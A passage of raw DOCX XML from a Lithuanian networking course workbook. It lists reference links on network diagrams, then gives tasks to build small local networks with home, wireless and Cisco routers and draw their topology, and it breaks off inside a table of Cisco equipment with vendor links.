          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NUBRAIŽYKITE TINKLO TOPOLOGIJĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75647250" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29824D7E" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Papildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E399F1" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Lovinus, A. (2015, spalio 21). 5 Free Tools to Draw a Network Diagram. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Newegg + Business</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId138">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64956ABF" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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What Is Network Topology? Best Guide to Types and Diagrams. (2019, rugpjūčio 15). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">DNSstaff. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId139">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.dnsstuff.com/what-is-network-topology</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="532D0411" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Microsoft 365 Team (2019, rugsėjo 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Patarimai, kaip sudaryti savo tinklo diagramą. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId140">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0101E27C" w14:textId="26BB3959" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405A6E83" w14:textId="5BAB4B42" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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2 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMI NAMŲ TIPO MARŠRUTIZATORIŲ IR TRIS KOMPIUTERIUS </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ. NUBRAIŽYKITE TINKLO TOPOLOGIJĄ</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E6BA9" w14:textId="26BB3959" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2385100F" w14:textId="5572F911" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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3</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NAUDODAMI MARŠRUTIZATORIŲ IR TRIS KOMPIUTERIUS </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ. NUBRAIŽYKITE TINKLO TOPOLOGIJĄ</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5C4E0" w14:textId="26BB3959" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381E8C68" w14:textId="15F5823B" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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4</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NAUDODAMI BEVIELĮ MARŠRUTIZATORIŲ IR TRIS KOMPIUTERIUS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUDARYKITE LOKALŲ KOMPIUTERIŲ TINKLĄ. KOMPIUTERIUS PRIJUNKITE WIFI STANDARTU. NUBRAIŽYKITE TINKLO TOPOLOGIJĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD531E" w14:textId="051A6CE8" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64338BB0" w14:textId="36C9F611" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00683BC8"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5</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LOKALAUS TINKLO SUDARYMAS PANAUDOJANT CISCO ĮRANGĄ</w:t>
      </w:r>
      <w:r w:rsidR="002E66C7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C037F23" w14:textId="71534079" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Naudo</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>damiesi</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pateiktu įrangos sąrašu pasiūl</w:t>
      </w:r>
      <w:r w:rsidR="00DC6341" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ykite</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tinklo fizinę ir loginę topologiją.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5BEBEE" w14:textId="5A6A531E" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CISCO Įrangos sąrašas:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="563"/>
        <w:gridCol w:w="2977"/>
        <w:gridCol w:w="6371"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="082BB6B5" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A1228A0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nr.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25AD8BEC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3215" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DDD91B6" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nuoroda</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4C135920" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="100CEB17" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AA380B5"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Cisco 4300 Series Model:ISR4321</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3215" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D8D982A" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId141" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.cisco.com/c/en/us/support/routers/4321-integrated-services-router/model.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2EEBC8A1" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:trPr>
          <w:trHeight w:val="260"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D4F009C" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AD72E4B"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Cisco 1600 Series N96-K079-0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3215" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C17FA58" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId142" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:szCs w:val="24"/>
                </w:rPr>
                <w:t>https://www.cisco.com/c/en/us/products/collateral/wireless/aironet-1600-series/data_sheet_c78-715702.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="12918F98" w14:textId="77777777" w:rsidTr="004E40EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="267C86FB" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1502" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17CF0ABD" w14:textId="29FCFBE1" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Cisco Catalyst 2960 Plus Series</w:t>
            </w:r>
            <w:r w:rsidR="004E40EE" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>WS-C2960+24TC-L</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3215" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CDBAD3A" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId143" w:history="1">
              <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
